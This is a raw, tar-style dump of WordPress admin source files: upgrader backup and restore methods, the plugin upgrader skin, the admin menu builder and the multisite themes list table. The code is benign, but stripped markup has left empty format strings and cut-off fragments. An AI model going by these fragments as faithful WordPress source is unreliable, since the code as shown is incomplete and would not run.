. '.lock' ); } /** * Moves the plugin or theme being updated into a temporary backup directory. * * @since 6.3.0 * * @global WP_Filesystem_Base $wp_filesystem WordPress filesystem subclass. * * @param string[] $args { * Array of data for the temporary backup. * * @type string $slug Plugin or theme slug. * @type string $src Path to the root directory for plugins or themes. * @type string $dir Destination subdirectory name. Accepts 'plugins' or 'themes'. * } * * @return bool|WP_Error True on success, false on early exit, otherwise WP_Error. */ public function move_to_temp_backup_dir( $args ) { global $wp_filesystem; if ( empty( $args['slug'] ) || empty( $args['src'] ) || empty( $args['dir'] ) ) { return false; } /* * Skip any plugin that has "." as its slug. * A slug of "." will result in a `$src` value ending in a period. * * On Windows, this will cause the 'plugins' folder to be moved, * and will cause a failure when attempting to call `mkdir()`. */ if ( '.' === $args['slug'] ) { return false; } if ( ! $wp_filesystem->wp_content_dir() ) { return new WP_Error( 'fs_no_content_dir', $this->strings['fs_no_content_dir'] ); } $dest_dir = $wp_filesystem->wp_content_dir() . 'upgrade-temp-backup/'; $sub_dir = $dest_dir . $args['dir'] . '/'; // Create the temporary backup directory if it does not exist. if ( ! $wp_filesystem->is_dir( $sub_dir ) ) { if ( ! $wp_filesystem->is_dir( $dest_dir ) ) { $wp_filesystem->mkdir( $dest_dir, FS_CHMOD_DIR ); } if ( ! $wp_filesystem->mkdir( $sub_dir, FS_CHMOD_DIR ) ) { // Could not create the backup directory. return new WP_Error( 'fs_temp_backup_mkdir', $this->strings['temp_backup_mkdir_failed'] ); } } $src_dir = $wp_filesystem->find_folder( $args['src'] ); $src = trailingslashit( $src_dir ) . $args['slug']; $dest = $dest_dir . trailingslashit( $args['dir'] ) . $args['slug']; // Delete the temporary backup directory if it already exists. if ( $wp_filesystem->is_dir( $dest ) ) { $wp_filesystem->delete( $dest, true ); } // Move to the temporary backup directory. $result = move_dir( $src, $dest, true ); if ( is_wp_error( $result ) ) { return new WP_Error( 'fs_temp_backup_move', $this->strings['temp_backup_move_failed'] ); } return true; } /** * Restores the plugin or theme from temporary backup. * * @since 6.3.0 * @since 6.6.0 Added the `$temp_backups` parameter. * * @global WP_Filesystem_Base $wp_filesystem WordPress filesystem subclass. * * @param array[] $temp_backups { * Optional. An array of temporary backups. * * @type array ...$0 { * Information about the backup. * * @type string $dir The temporary backup location in the upgrade-temp-backup directory. * @type string $slug The item's slug. * @type string $src The directory where the original is stored. For example, `WP_PLUGIN_DIR`. * } * } * @return bool|WP_Error True on success, false on early exit, otherwise WP_Error. */ public function restore_temp_backup( array $temp_backups = array() ) { global $wp_filesystem; $errors = new WP_Error(); if ( empty( $temp_backups ) ) { $temp_backups = $this->temp_restores; } foreach ( $temp_backups as $args ) { if ( empty( $args['slug'] ) || empty( $args['src'] ) || empty( $args['dir'] ) ) { return false; } if ( ! $wp_filesystem->wp_content_dir() ) { $errors->add( 'fs_no_content_dir', $this->strings['fs_no_content_dir'] ); return $errors; } $src = $wp_filesystem->wp_content_dir() . 'upgrade-temp-backup/' . $args['dir'] . '/' . $args['slug']; $dest_dir = $wp_filesystem->find_folder( $args['src'] ); $dest = trailingslashit( $dest_dir ) . $args['slug']; if ( $wp_filesystem->is_dir( $src ) ) { // Cleanup. if ( $wp_filesystem->is_dir( $dest ) && ! $wp_filesystem->delete( $dest, true ) ) { $errors->add( 'fs_temp_backup_delete', sprintf( $this->strings['temp_backup_restore_failed'], $args['slug'] ) ); continue; } // Move it. $result = move_dir( $src, $dest, true ); if ( is_wp_error( $result ) ) { $errors->add( 'fs_temp_backup_delete', sprintf( $this->strings['temp_backup_restore_failed'], $args['slug'] ) ); continue; } } } return $errors->has_errors() ? $errors : true; } /** * Deletes a temporary backup. * * @since 6.3.0 * @since 6.6.0 Added the `$temp_backups` parameter. * * @global WP_Filesystem_Base $wp_filesystem WordPress filesystem subclass. * * @param array[] $temp_backups { * Optional. An array of temporary backups. * * @type array ...$0 { * Information about the backup. * * @type string $dir The temporary backup location in the upgrade-temp-backup directory. * @type string $slug The item's slug. * @type string $src The directory where the original is stored. For example, `WP_PLUGIN_DIR`. * } * } * @return bool|WP_Error True on success, false on early exit, otherwise WP_Error. */ public function delete_temp_backup( array $temp_backups = array() ) { global $wp_filesystem; $errors = new WP_Error(); if ( empty( $temp_backups ) ) { $temp_backups = $this->temp_backups; } foreach ( $temp_backups as $args ) { if ( empty( $args['slug'] ) || empty( $args['dir'] ) ) { return false; } if ( ! $wp_filesystem->wp_content_dir() ) { $errors->add( 'fs_no_content_dir', $this->strings['fs_no_content_dir'] ); return $errors; } $temp_backup_dir = $wp_filesystem->wp_content_dir() . "upgrade-temp-backup/{$args['dir']}/{$args['slug']}"; if ( ! $wp_filesystem->delete( $temp_backup_dir, true ) ) { $errors->add( 'temp_backup_delete_failed', sprintf( $this->strings['temp_backup_delete_failed'], $args['slug'] ) ); continue; } } return $errors->has_errors() ? $errors : true; } } /** Plugin_Upgrader class */ require_once ABSPATH . 'wp-admin/includes/class-plugin-upgrader.php'; /** Theme_Upgrader class */ require_once ABSPATH . 'wp-admin/includes/class-theme-upgrader.php'; /** Language_Pack_Upgrader class */ require_once ABSPATH . 'wp-admin/includes/class-language-pack-upgrader.php'; /** Core_Upgrader class */ require_once ABSPATH . 'wp-admin/includes/class-core-upgrader.php'; /** File_Upload_Upgrader class */ require_once ABSPATH . 'wp-admin/includes/class-file-upload-upgrader.php'; /** WP_Automatic_Updater class */ require_once ABSPATH . 'wp-admin/includes/class-wp-automatic-updater.php'; includes/class-plugin-upgrader-skin.php000064400000006316152075237570014260 0ustar00 '', 'plugin' => '', 'nonce' => '', 'title' => __( 'Update Plugin' ), ); $args = wp_parse_args( $args, $defaults ); $this->plugin = $args['plugin']; $this->plugin_active = is_plugin_active( $this->plugin ); $this->plugin_network_active = is_plugin_active_for_network( $this->plugin ); parent::__construct( $args ); } /** * Performs an action following a single plugin update. * * @since 2.8.0 */ public function after() { $this->plugin = $this->upgrader->plugin_info(); if ( ! empty( $this->plugin ) && ! is_wp_error( $this->result ) && $this->plugin_active ) { // Currently used only when JS is off for a single plugin update? printf( '', esc_attr__( 'Update progress' ), wp_nonce_url( 'update.php?action=activate-plugin&networkwide=' . $this->plugin_network_active . '&plugin=' . urlencode( $this->plugin ), 'activate-plugin_' . $this->plugin ) ); } $this->decrement_update_count( 'plugin' ); $update_actions = array( 'activate_plugin' => sprintf( '%s', wp_nonce_url( 'plugins.php?action=activate&plugin=' . urlencode( $this->plugin ), 'activate-plugin_' . $this->plugin ), __( 'Activate Plugin' ) ), 'plugins_page' => sprintf( '%s', self_admin_url( 'plugins.php' ), __( 'Go to Plugins page' ) ), ); if ( $this->plugin_active || ! $this->result || is_wp_error( $this->result ) || ! current_user_can( 'activate_plugin', $this->plugin ) ) { unset( $update_actions['activate_plugin'] ); } /** * Filters the list of action links available following a single plugin update. * * @since 2.7.0 * * @param string[] $update_actions Array of plugin action links. * @param string $plugin Path to the plugin file relative to the plugins directory. */ $update_actions = apply_filters( 'update_plugin_complete_actions', $update_actions, $this->plugin ); if ( ! empty( $update_actions ) ) { $this->feedback( implode( ' | ', (array) $update_actions ) ); } } } includes/menu.php000064400000022622152075237570010050 0ustar00 $sub ) { foreach ( $sub as $index => $data ) { if ( ! current_user_can( $data[1] ) ) { unset( $submenu[ $parent ][ $index ] ); $_wp_submenu_nopriv[ $parent ][ $data[2] ] = true; } } unset( $index, $data ); if ( empty( $submenu[ $parent ] ) ) { unset( $submenu[ $parent ] ); } } unset( $sub, $parent ); /* * Loop over the top-level menu. * Menus for which the original parent is not accessible due to lack of privileges * will have the next submenu in line be assigned as the new menu parent. */ foreach ( $menu as $id => $data ) { if ( empty( $submenu[ $data[2] ] ) ) { continue; } $subs = $submenu[ $data[2] ]; $first_sub = reset( $subs ); $old_parent = $data[2]; $new_parent = $first_sub[2]; /* * If the first submenu is not the same as the assigned parent, * make the first submenu the new parent. */ if ( $new_parent !== $old_parent ) { $_wp_real_parent_file[ $old_parent ] = $new_parent; $menu[ $id ][2] = $new_parent; foreach ( $submenu[ $old_parent ] as $index => $data ) { $submenu[ $new_parent ][ $index ] = $submenu[ $old_parent ][ $index ]; unset( $submenu[ $old_parent ][ $index ] ); } unset( $submenu[ $old_parent ], $index ); if ( isset( $_wp_submenu_nopriv[ $old_parent ] ) ) { $_wp_submenu_nopriv[ $new_parent ] = $_wp_submenu_nopriv[ $old_parent ]; } } } unset( $id, $data, $subs, $first_sub, $old_parent, $new_parent ); if ( is_network_admin() ) { /** * Fires before the administration menu loads in the Network Admin. * * @since 3.1.0 * * @param string $context Empty context. */ do_action( 'network_admin_menu', '' ); } elseif ( is_user_admin() ) { /** * Fires before the administration menu loads in the User Admin. * * @since 3.1.0 * * @param string $context Empty context. */ do_action( 'user_admin_menu', '' ); } else { /** * Fires before the administration menu loads in the admin. * * @since 1.5.0 * * @param string $context Empty context. */ do_action( 'admin_menu', '' ); } /* * Remove menus that have no accessible submenus and require privileges * that the user does not have. Run re-parent loop again. */ foreach ( $menu as $id => $data ) { if ( ! current_user_can( $data[1] ) ) { $_wp_menu_nopriv[ $data[2] ] = true; } /* * If there is only one submenu and it is has same destination as the parent, * remove the submenu. */ if ( ! empty( $submenu[ $data[2] ] ) && 1 === count( $submenu[ $data[2] ] ) ) { $subs = $submenu[ $data[2] ]; $first_sub = reset( $subs ); if ( $data[2] === $first_sub[2] ) { unset( $submenu[ $data[2] ] ); } } // If submenu is empty... if ( empty( $submenu[ $data[2] ] ) ) { // And user doesn't have privs, remove menu. if ( isset( $_wp_menu_nopriv[ $data[2] ] ) ) { unset( $menu[ $id ] ); } } } unset( $id, $data, $subs, $first_sub ); /** * Adds a CSS class to a string. * * @since 2.7.0 * * @param string $class_to_add The CSS class to add. * @param string $classes The string to add the CSS class to. * @return string The string with the CSS class added. */ function add_cssclass( $class_to_add, $classes ) { if ( empty( $classes ) ) { return $class_to_add; } return $classes . ' ' . $class_to_add; } /** * Adds CSS classes for top-level administration menu items. * * The list of added classes includes `.menu-top-first` and `.menu-top-last`. * * @since 2.7.0 * * @param array $menu The array of administration menu items. * @return array The array of administration menu items with the CSS classes added. */ function add_menu_classes( $menu ) { $first_item = false; $last_order = false; $items_count = count( $menu ); $i = 0; foreach ( $menu as $order => $top ) { ++$i; if ( 0 === $order ) { // Dashboard is always shown/single. $menu[0][4] = add_cssclass( 'menu-top-first', $top[4] ); $last_order = 0; continue; } if ( str_starts_with( $top[2], 'separator' ) && false !== $last_order ) { // If separator. $first_item = true; $classes = $menu[ $last_order ][4]; $menu[ $last_order ][4] = add_cssclass( 'menu-top-last', $classes ); continue; } if ( $first_item ) { $first_item = false; $classes = $menu[ $order ][4]; $menu[ $order ][4] = add_cssclass( 'menu-top-first', $classes ); } if ( $i === $items_count ) { // Last item. $classes = $menu[ $order ][4]; $menu[ $order ][4] = add_cssclass( 'menu-top-last', $classes ); } $last_order = $order; } /** * Filters administration menu array with classes added for top-level items. * * @since 2.7.0 * * @param array $menu Associative array of administration menu items. */ return apply_filters( 'add_menu_classes', $menu ); } uksort( $menu, 'strnatcasecmp' ); // Make it all pretty. /** * Filters whether to enable custom ordering of the administration menu. * * See the {@see 'menu_order'} filter for reordering menu items. * * @since 2.8.0 * * @param bool $custom Whether custom ordering is enabled. Default false. */ if ( apply_filters( 'custom_menu_order', false ) ) { $menu_order = array(); foreach ( $menu as $menu_item ) { $menu_order[] = $menu_item[2]; } unset( $menu_item ); $default_menu_order = $menu_order; /** * Filters the order of administration menu items. * * A truthy value must first be passed to the {@see 'custom_menu_order'} filter * for this filter to work. Use the following to enable custom menu ordering: * * add_filter( 'custom_menu_order', '__return_true' ); * * @since 2.8.0 * * @param array $menu_order An ordered array of menu items. */ $menu_order = apply_filters( 'menu_order', $menu_order ); $menu_order = array_flip( $menu_order ); $default_menu_order = array_flip( $default_menu_order ); /** * @global array $menu_order * @global array $default_menu_order * * @param array $a * @param array $b * @return int */ function sort_menu( $a, $b ) { global $menu_order, $default_menu_order; $a = $a[2]; $b = $b[2]; if ( isset( $menu_order[ $a ] ) && ! isset( $menu_order[ $b ] ) ) { return -1; } elseif ( ! isset( $menu_order[ $a ] ) && isset( $menu_order[ $b ] ) ) { return 1; } elseif ( isset( $menu_order[ $a ] ) && isset( $menu_order[ $b ] ) ) { if ( $menu_order[ $a ] === $menu_order[ $b ] ) { return 0; } return ( $menu_order[ $a ] < $menu_order[ $b ] ) ? -1 : 1; } else { return ( $default_menu_order[ $a ] <= $default_menu_order[ $b ] ) ? -1 : 1; } } usort( $menu, 'sort_menu' ); unset( $menu_order, $default_menu_order ); } // Prevent adjacent separators. $prev_menu_was_separator = false; foreach ( $menu as $id => $data ) { if ( false === stristr( $data[4], 'wp-menu-separator' ) ) { // This item is not a separator, so falsey the toggler and do nothing. $prev_menu_was_separator = false; } else { // The previous item was a separator, so unset this one. if ( true === $prev_menu_was_separator ) { unset( $menu[ $id ] ); } // This item is a separator, so truthy the toggler and move on. $prev_menu_was_separator = true; } } unset( $id, $data, $prev_menu_was_separator ); // Remove the last menu item if it is a separator. $last_menu_key = array_keys( $menu ); $last_menu_key = array_pop( $last_menu_key ); if ( ! empty( $menu ) && 'wp-menu-separator' === $menu[ $last_menu_key ][4] ) { unset( $menu[ $last_menu_key ] ); } unset( $last_menu_key ); if ( ! user_can_access_admin_page() ) { /** * Fires when access to an admin page is denied. * * @since 2.5.0 */ do_action( 'admin_page_access_denied' ); wp_die( __( 'Sorry, you are not allowed to access this page.' ), 403 ); } $menu = add_menu_classes( $menu ); includes/class-wp-ms-themes-list-table.php000064400000067426152075237570014606 0ustar00 'themes', 'screen' => isset( $args['screen'] ) ? $args['screen'] : null, ) ); $status = isset( $_REQUEST['theme_status'] ) ? $_REQUEST['theme_status'] : 'all'; if ( ! in_array( $status, array( 'all', 'enabled', 'disabled', 'upgrade', 'search', 'broken', 'auto-update-enabled', 'auto-update-disabled' ), true ) ) { $status = 'all'; } $page = $this->get_pagenum(); $this->is_site_themes = ( 'site-themes-network' === $this->screen->id ) ? true : false; if ( $this->is_site_themes ) { $this->site_id = isset( $_REQUEST['id'] ) ? (int) $_REQUEST['id'] : 0; } $this->show_autoupdates = wp_is_auto_update_enabled_for_type( 'theme' ) && ! $this->is_site_themes && current_user_can( 'update_themes' ); } /** * @return array */ protected function get_table_classes() { // @todo Remove and add CSS for .themes. return array( 'widefat', 'plugins' ); } /** * @return bool */ public function ajax_user_can() { if ( $this->is_site_themes ) { return current_user_can( 'manage_sites' ); } else { return current_user_can( 'manage_network_themes' ); } } /** * @global string $status * @global array $totals * @global int $page * @global string $orderby * @global string $order * @global string $s */ public function prepare_items() { global $status, $totals, $page, $orderby, $order, $s; $orderby = ! empty( $_REQUEST['orderby'] ) ? sanitize_text_field( $_REQUEST['orderby'] ) : ''; $order = ! empty( $_REQUEST['order'] ) ? sanitize_text_field( $_REQUEST['order'] ) : ''; $s = ! empty( $_REQUEST['s'] ) ? sanitize_text_field( $_REQUEST['s'] ) : ''; $themes = array( /** * Filters the full array of WP_Theme objects to list in the Multisite * themes list table. * * @since 3.1.0 * * @param WP_Theme[] $all Array of WP_Theme objects to display in the list table. */ 'all' => apply_filters( 'all_themes', wp_get_themes() ), 'search' => array(), 'enabled' => array(), 'disabled' => array(), 'upgrade' => array(), 'broken' => $this->is_site_themes ? array() : wp_get_themes( array( 'errors' => true ) ), ); if ( $this->show_autoupdates ) { $auto_updates = (array) get_site_option( 'auto_update_themes', array() ); $themes['auto-update-enabled'] = array(); $themes['auto-update-disabled'] = array(); } if ( $this->is_site_themes ) { $themes_per_page = $this->get_items_per_page( 'site_themes_network_per_page' ); $allowed_where = 'site'; } else { $themes_per_page = $this->get_items_per_page( 'themes_network_per_page' ); $allowed_where = 'network'; } $current = get_site_transient( 'update_themes' ); $maybe_update = current_user_can( 'update_themes' ) && ! $this->is_site_themes && $current; foreach ( (array) $themes['all'] as $key => $theme ) { if ( $this->is_site_themes && $theme->is_allowed( 'network' ) ) { unset( $themes['all'][ $key ] ); continue; } if ( $maybe_update && isset( $current->response[ $key ] ) ) { $themes['all'][ $key ]->update = true; $themes['upgrade'][ $key ] = $themes['all'][ $key ]; } $filter = $theme->is_allowed( $allowed_where, $this->site_id ) ? 'enabled' : 'disabled'; $themes[ $filter ][ $key ] = $themes['all'][ $key ]; $theme_data = array( 'update_supported' => isset( $theme->update_supported ) ? $theme->update_supported : true, ); // Extra info if known. array_merge() ensures $theme_data has precedence if keys collide. if ( isset( $current->response[ $key ] ) ) { $theme_data = array_merge( (array) $current->response[ $key ], $theme_data ); } elseif ( isset( $current->no_update[ $key ] ) ) { $theme_data = array_merge( (array) $current->no_update[ $key ], $theme_data ); } else { $theme_data['update_supported'] = false; } $theme->update_supported = $theme_data['update_supported']; /* * Create the expected payload for the auto_update_theme filter, this is the same data * as contained within $updates or $no_updates but used when the Theme is not known. */ $filter_payload = array( 'theme' => $key, 'new_version' => '', 'url' => '', 'package' => '', 'requires' => '', 'requires_php' => '', ); $filter_payload = (object) array_merge( $filter_payload, array_intersect_key( $theme_data, $filter_payload ) ); $auto_update_forced = wp_is_auto_update_forced_for_item( 'theme', null, $filter_payload ); if ( ! is_null( $auto_update_forced ) ) { $theme->auto_update_forced = $auto_update_forced; } if ( $this->show_autoupdates ) { $enabled = in_array( $key, $auto_updates, true ) && $theme->update_supported; if ( isset( $theme->auto_update_forced ) ) { $enabled = (bool) $theme->auto_update_forced; } if ( $enabled ) { $themes['auto-update-enabled'][ $key ] = $theme; } else { $themes['auto-update-disabled'][ $key ] = $theme; } } } if ( $s ) { $status = 'search'; $themes['search'] = array_filter( array_merge( $themes['all'], $themes['broken'] ), array( $this, '_search_callback' ) ); } $totals = array(); $js_themes = array(); foreach ( $themes as $type => $list ) { $totals[ $type ] = count( $list ); $js_themes[ $type ] = array_keys( $list ); } if ( empty( $themes[ $status ] ) && ! in_array( $status, array( 'all', 'search' ), true ) ) { $status = 'all'; } $this->items = $themes[ $status ]; WP_Theme::sort_by_name( $this->items ); $this->has_items = ! empty( $themes['all'] ); $total_this_page = $totals[ $status ]; wp_localize_script( 'updates', '_wpUpdatesItemCounts', array( 'themes' => $js_themes, 'totals' => wp_get_update_data(), ) ); if ( $orderby ) { $orderby = ucfirst( $orderby ); $order = strtoupper( $order ); if ( 'Name' === $orderby ) { if ( 'ASC' === $order ) { $this->items = array_reverse( $this->items ); } } else { uasort( $this->items, array( $this, '_order_callback' ) ); } } $start = ( $page - 1 ) * $themes_per_page; if ( $total_this_page > $themes_per_page ) { $this->items = array_slice( $this->items, $start, $themes_per_page, true ); } $this->set_pagination_args( array( 'total_items' => $total_this_page, 'per_page' => $themes_per_page, ) ); } /** * @param WP_Theme $theme * @return bool */ public function _search_callback( $theme ) { static $term = null; if ( is_null( $term ) ) { $term = wp_unslash( $_REQUEST['s'] ); } foreach ( array( 'Name', 'Description', 'Author', 'Author', 'AuthorURI' ) as $field ) { // Don't mark up; Do translate. if ( false !== stripos( $theme->display( $field, false, true ), $term ) ) { return true; } } if ( false !== stripos( $theme->get_stylesheet(), $term ) ) { return true; } if ( false !== stripos( $theme->get_template(), $term ) ) { return true; } return false; } // Not used by any core columns. /** * @global string $orderby * @global string $order * @param array $theme_a * @param array $theme_b * @return int */ public function _order_callback( $theme_a, $theme_b ) { global $orderby, $order; $a = $theme_a[ $orderby ]; $b = $theme_b[ $orderby ]; if ( $a === $b ) { return 0; } if ( 'DESC' === $order ) { return ( $a < $b ) ? 1 : -1; } else { return ( $a < $b ) ? -1 : 1; } } /** */ public function no_items() { if ( $this->has_items ) { _e( 'No themes found.' ); } else { _e( 'No themes are currently available.' ); } } /** * @return string[] Array of column titles keyed by their column name. */ public function get_columns() { $columns = array( 'cb' => '', 'name' => __( 'Theme' ), 'description' => __( 'Description' ), ); if ( $this->show_autoupdates ) { $columns['auto-updates'] = __( 'Automatic Updates' ); } return $columns; } /** * @return array */ protected function get_sortable_columns() { return array( 'name' => array( 'name', false, __( 'Theme' ), __( 'Table ordered by Theme Name.' ), 'asc' ), ); } /** * Gets the name of the primary column. * * @since 4.3.0 * * @return string Unalterable name of the primary column name, in this case, 'name'. */ protected function get_primary_column_name() { return 'name'; } /** * @global array $totals * @global string $status * @return array */ protected function get_views() { global $totals, $status; $status_links = array(); foreach ( $totals as $type => $count ) { if ( ! $count ) { continue; } switch ( $type ) { case 'all': /* translators: %s: Number of themes. */ $text = _nx( 'All (%s)', 'All (%s)', $count, 'themes' ); break; case 'enabled': /* translators: %s: Number of themes. */ $text = _nx( 'Enabled (%s)', 'Enabled (%s)', $count, 'themes' ); break; case 'disabled': /* translators: %s: Number of themes. */ $text = _nx( 'Disabled (%s)', 'Disabled (%s)', $count, 'themes' ); break; case 'upgrade': /* translators: %s: Number of themes. */ $text = _nx( 'Update Available (%s)', 'Update Available (%s)', $count, 'themes' ); break; case 'broken': /* translators: %s: Number of themes. */ $text = _nx( 'Broken (%s)', 'Broken (%s)', $count, 'themes' ); break; case 'auto-update-enabled': /* translators: %s: Number of themes. */ $text = _n( 'Auto-updates Enabled (%s)', 'Auto-updates Enabled (%s)', $count ); break; case 'auto-update-disabled': /* translators: %s: Number of themes. */ $text = _n( 'Auto-updates Disabled (%s)', 'Auto-updates Disabled (%s)', $count ); break; } if ( $this->is_site_themes ) { $url = 'site-themes.php?id=' . $this->site_id; } else { $url = 'themes.php'; } if ( 'search' !== $type ) { $status_links[ $type ] = array( 'url' => esc_url( add_query_arg( 'theme_status', $type, $url ) ), 'label' => sprintf( $text, number_format_i18n( $count ) ), 'current' => $type === $status, ); } } return $this->get_views_links( $status_links ); } /** * @global string $status * * @return array */ protected function get_bulk_actions() { global $status; $actions = array(); if ( 'enabled' !== $status ) { $actions['enable-selected'] = $this->is_site_themes ? __( 'Enable' ) : __( 'Network Enable' ); } if ( 'disabled' !== $status ) { $actions['disable-selected'] = $this->is_site_themes ? __( 'Disable' ) : __( 'Network Disable' ); } if ( ! $this->is_site_themes ) { if ( current_user_can( 'update_themes' ) ) { $actions['update-selected'] = __( 'Update' ); } if ( current_user_can( 'delete_themes' ) ) { $actions['delete-selected'] = __( 'Delete' ); } } if ( $this->show_autoupdates ) { if ( 'auto-update-enabled' !== $status ) { $actions['enable-auto-update-selected'] = __( 'Enable Auto-updates' ); } if ( 'auto-update-disabled' !== $status ) { $actions['disable-auto-update-selected'] = __( 'Disable Auto-updates' ); } } return $actions; } /** * Generates the list table rows. * * @since 3.1.0 */ public function display_rows() { foreach ( $this->items as $theme ) { $this->single_row( $theme ); } } /** * Handles the checkbox column output. * * @since 4.3.0 * @since 5.9.0 Renamed `$theme` to `$item` to match parent class for PHP 8 named parameter support. * * @param WP_Theme $item The current WP_Theme object. */ public function column_cb( $item ) { // Restores the more descriptive, specific name for use within this method. $theme = $item; $checkbox_id = 'checkbox_' . md5( $theme->get( 'Name' ) ); ?> is_site_themes ) { $url = "site-themes.php?id={$this->site_id}&"; $allowed = $theme->is_allowed( 'site', $this->site_id ); } else { $url = 'themes.php?'; $allowed = $theme->is_allowed( 'network' ); } // Pre-order. $actions = array( 'enable' => '', 'disable' => '', 'delete' => '', ); $stylesheet = $theme->get_stylesheet(); $theme_key = urlencode( $stylesheet ); if ( ! $allowed ) { if ( ! $theme->errors() ) { $url = add_query_arg( array( 'action' => 'enable', 'theme' => $theme_key, 'paged' => $page, 's' => $s, ), $url ); if ( $this->is_site_themes ) { /* translators: %s: Theme name. */ $aria_label = sprintf( __( 'Enable %s' ), $theme->display( 'Name' ) ); } else { /* translators: %s: Theme name. */ $aria_label = sprintf( __( 'Network Enable %s' ), $theme->display( 'Name' ) ); } $actions['enable'] = sprintf( '%s', esc_url( wp_nonce_url( $url, 'enable-theme_' . $stylesheet ) ), esc_attr( $aria_label ), ( $this->is_site_themes ? __( 'Enable' ) : __( 'Network Enable' ) ) ); } } else { $url = add_query_arg( array( 'action' => 'disable', 'theme' => $theme_key, 'paged' => $page, 's' => $s, ), $url ); if ( $this->is_site_themes ) { /* translators: %s: Theme name. */ $aria_label = sprintf( __( 'Disable %s' ), $theme->display( 'Name' ) ); } else { /* translators: %s: Theme name. */ $aria_label = sprintf( __( 'Network Disable %s' ), $theme->display( 'Name' ) ); } $actions['disable'] = sprintf( '%s', esc_url( wp_nonce_url( $url, 'disable-theme_' . $stylesheet ) ), esc_attr( $aria_label ), ( $this->is_site_themes ? __( 'Disable' ) : __( 'Network Disable' ) ) ); } if ( ! $allowed && ! $this->is_site_themes && current_user_can( 'delete_themes' ) && get_option( 'stylesheet' ) !== $stylesheet && get_option( 'template' ) !== $stylesheet ) { $url = add_query_arg( array( 'action' => 'delete-selected', 'checked[]' => $theme_key, 'theme_status' => $context, 'paged' => $page, 's' => $s, ), 'themes.php' ); /* translators: %s: Theme name. */ $aria_label = sprintf( _x( 'Delete %s', 'theme' ), $theme->display( 'Name' ) ); $actions['delete'] = sprintf( '%s', esc_url( wp_nonce_url( $url, 'bulk-themes' ) ), esc_attr( $aria_label ), __( 'Delete' ) ); } /** * Filters the action links displayed for each theme in the Multisite * themes list table. * * The action links displayed are determined by the theme's status, and * which Multisite themes list table is being displayed - the Network * themes list table (themes.php), which displays all installed themes, * or the Site themes list table (site-themes.php), which displays the * non-network enabled themes when editing a site in the Network admin. * * The default action links for the Network themes list table include * 'Network Enable', 'Network Disable', and 'Delete'. * * The default action links for the Site themes list table include * 'Enable', and 'Disable'. * * @since 2.8.0 * * @param string[] $actions An array of action links. * @param WP_Theme $theme The current WP_Theme object. * @param string $context Status of the theme, one of 'all', 'enabled', or 'disabled'. */ $actions = apply_filters( 'theme_action_links', array_filter( $actions ), $theme, $context ); /** * Filters the action links of a specific theme in the Multisite themes * list table. * * The dynamic portion of the hook name, `$stylesheet`, refers to the * directory name of the theme, which in most cases is synonymous * with the template name. * * @since 3.1.0 * * @param string[] $actions An array of action links. * @param WP_Theme $theme The current WP_Theme object. * @param string $context Status of the theme, one of 'all', 'enabled', or 'disabled'. */ $actions = apply_filters( "theme_action_links_{$stylesheet}", $actions, $theme, $context ); echo $this->row_actions( $actions, true ); } /** * Handles the description column output. * * @since 4.3.0 * * @global string $status * @global array $totals * * @param WP_Theme $theme The current WP_Theme object. */ public function column_description( $theme ) { global $status, $totals; if ( $theme->errors() ) { $pre = 'broken' === $status ? '' . __( 'Broken Theme:' ) . ' ' : ''; wp_admin_notice( $pre . $theme->errors()->get_error_message(), array( 'type' => 'error', 'additional_classes' => 'inline', ) ); } if ( $this->is_site_themes ) { $allowed = $theme->is_allowed( 'site', $this->site_id ); } else { $allowed = $theme->is_allowed( 'network' ); } $class = ! $allowed ? 'inactive' : 'active'; if ( ! empty( $totals['upgrade'] ) && ! empty( $theme->update ) ) { $class .= ' update'; } echo "

    " . $theme->display( 'Description' ) . "

    "; $stylesheet = $theme->get_stylesheet(); $theme_meta = array(); if ( $theme->get( 'Version' ) ) { /* translators: %s: Theme version. */ $theme_meta[] = sprintf( __( 'Version %s' ), $theme->display( 'Version' ) ); } /* translators: %s: Theme author. */ $theme_meta[] = sprintf( __( 'By %s' ), $theme->display( 'Author' ) ); if ( $theme->get( 'ThemeURI' ) ) { /* translators: %s: Theme name. */ $aria_label = sprintf( __( 'Visit theme site for %s' ), $theme->display( 'Name' ) ); $theme_meta[] = sprintf( '%s', $theme->display( 'ThemeURI' ), esc_attr( $aria_label ), __( 'Visit Theme Site' ) ); } if ( $theme->parent() ) { $theme_meta[] = sprintf( /* translators: %s: Theme name. */ __( 'Child theme of %s' ), '' . $theme->parent()->display( 'Name' ) . '' ); } /** * Filters the array of row meta for each theme in the Multisite themes * list table. * * @since 3.1.0 * * @param string[] $theme_meta An array of the theme's metadata, including * the version, author, and theme URI. * @param string $stylesheet Directory name of the theme. * @param WP_Theme $theme WP_Theme object. * @param string $status Status of the theme. */ $theme_meta = apply_filters( 'theme_row_meta', $theme_meta, $stylesheet, $theme, $status ); echo implode( ' | ', $theme_meta ); echo '
    '; } /** * Handles the auto-updates column output. * * @since 5.5.0 * * @global string $status * @global int $page * * @param WP_Theme $theme The current WP_Theme object. */ public function column_autoupdates( $theme ) { global $status, $page; static $auto_updates, $available_updates; if ( ! $auto_updates ) { $auto_updates = (array) get_site_option( 'auto_update_themes', array() ); } if ( ! $available_updates ) { $available_updates = get_site_transient( 'update_themes' ); } $stylesheet = $theme->get_stylesheet(); if ( isset( $theme->auto_update_forced ) ) { if ( $theme->auto_update_forced ) { // Forced on. $text = __( 'Auto-updates enabled' ); } else { $text = __( 'Auto-updates disabled' ); } $action = 'unavailable'; $time_class = ' hidden'; } elseif ( empty( $theme->update_supported ) ) { $text = ''; $action = 'unavailable'; $time_class = ' hidden'; } elseif ( in_array( $stylesheet, $auto_updates, true ) ) { $text = __( 'Disable auto-updates' ); $action = 'disable'; $time_class = ''; } else { $text = __( 'Enable auto-updates' ); $action = 'enable'; $time_class = ' hidden'; } $query_args = array( 'action' => "{$action}-auto-update", 'theme' => $stylesheet, 'paged' => $page, 'theme_status' => $status, ); $url = add_query_arg( $query_args, 'themes.php' ); if ( 'unavailable' === $action ) { $html[] = '' . $text . ''; } else { $html[] = sprintf( '', wp_nonce_url( $url, 'updates' ), $action ); $html[] = ''; $html[] = '' . $text . ''; $html[] = ''; } if ( isset( $available_updates->response[ $stylesheet ] ) ) { $html[] = sprintf( '
    %s
